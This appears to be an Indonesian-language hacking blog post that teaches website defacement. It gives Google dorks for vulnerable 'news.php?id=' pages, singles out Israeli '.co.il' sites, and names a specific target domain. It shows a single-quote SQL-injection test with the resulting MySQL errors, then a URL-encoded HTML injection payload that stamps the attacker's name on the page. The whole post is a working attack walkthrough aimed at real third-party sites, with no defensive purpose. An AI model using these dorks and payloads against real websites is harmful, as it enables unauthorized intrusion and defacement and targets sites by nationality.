Deface metode xss

Kali ini gua akan kasih tutor deface metode xss
Gua kunaichi gans ye kan:v

Bahan2=
-hp
-internet
-kopi
-udud:v
-sc html kalo blom punya colong di google banyak:v
Seperti biasa kita dorking dulu ya tod-_
inurl:/news.php?id=
inurl:/news.php?id= site.co.il (israel)
Lu kembangin sendiri eaa dork nya janngn manjaa asw :v

2. Kemudian pilih salah satu website target anda

3. Sebagai contoh gua mendapatkan target website untuk di deface, yaitu http://isr-tkd.com/index.php?cntr=e/news.php?id=1


4. Selanjutnya cek website apakan vuln atau tidak, cara nya tambahkan tanda koma atas ( ' ) di akhir id=1'

contoh:

 http://isr-tkd.com/index.php?cntr=e/news.php?id=1'
website yang vuln akan menampilkan error, dengan tulisan seperti dibawah ini:
  • Warning: mysql_result() expects parameter 1 to be resource, boolean given in /home/isrtkd/public_html/press.php on line 4
  • You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''

5. Kemudian lakukan penambahan exploit untuk melanjutkan deface website menggunakan XSS
seperti contoh dibawah ini,

 http://isr-tkd.com/index.php?cntr=e/news.php?id=1%3Ch1%3ETouched%20By%20Kunaichi%20by%20andqueenbocil%3C/h1%3E
Maka hasil nya akan seperti ini :

Post a Comment

Previous Post Next Post